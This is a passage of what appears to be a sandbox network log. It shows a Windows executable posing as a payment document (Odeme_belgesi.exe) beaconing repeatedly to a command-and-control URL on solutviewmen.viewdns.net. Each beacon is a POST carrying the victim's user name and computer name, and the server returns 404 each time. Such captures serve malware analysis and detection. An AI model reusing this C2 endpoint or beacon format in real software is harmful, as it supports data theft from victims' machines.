Oct 1, 2024 10:56:31.057346106 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49811	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:31.355782986 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:31.360697985 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:32.074229002 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49812	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:32.239622116 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:32.244487047 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:32.917283058 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49813	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:33.073720932 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:33.078751087 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:33.794236898 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49814	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:34.259226084 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:34.264055014 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:34.954164982 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49815	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:35.113996029 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:35.118822098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:35.846981049 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49816	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:36.002137899 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:36.007121086 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:36.897743940 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49817	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:37.072134018 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:37.076988935 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:37.826824903 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49818	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:37.988904953 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:37.993838072 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:38.657680035 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49819	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:38.812674999 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:38.817576885 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:39.503447056 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49820	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:39.669230938 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:39.675483942 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:40.380754948 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49821	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:40.538661957 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:40.543639898 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:41.310524940 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49822	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:41.464965105 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:41.469899893 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:42.196302891 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49823	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:42.350737095 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:42.355680943 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:43.188508034 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49824	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:43.341423035 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:43.346923113 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:44.087699890 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49825	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:44.245318890 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:44.250216961 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:44.963037014 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49826	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:45.119550943 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:45.124435902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:45.843538046 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49827	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:45.996553898 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:46.001924992 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:46.767757893 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49828	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:46.927398920 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:46.932311058 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:47.567887068 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49829	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:47.710268974 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:47.715173006 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:48.474303007 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:20 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49830	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:48.651488066 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:48.656357050 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:49.332030058 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49831	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:49.488979101 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:49.497277021 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:50.153675079 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49832	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
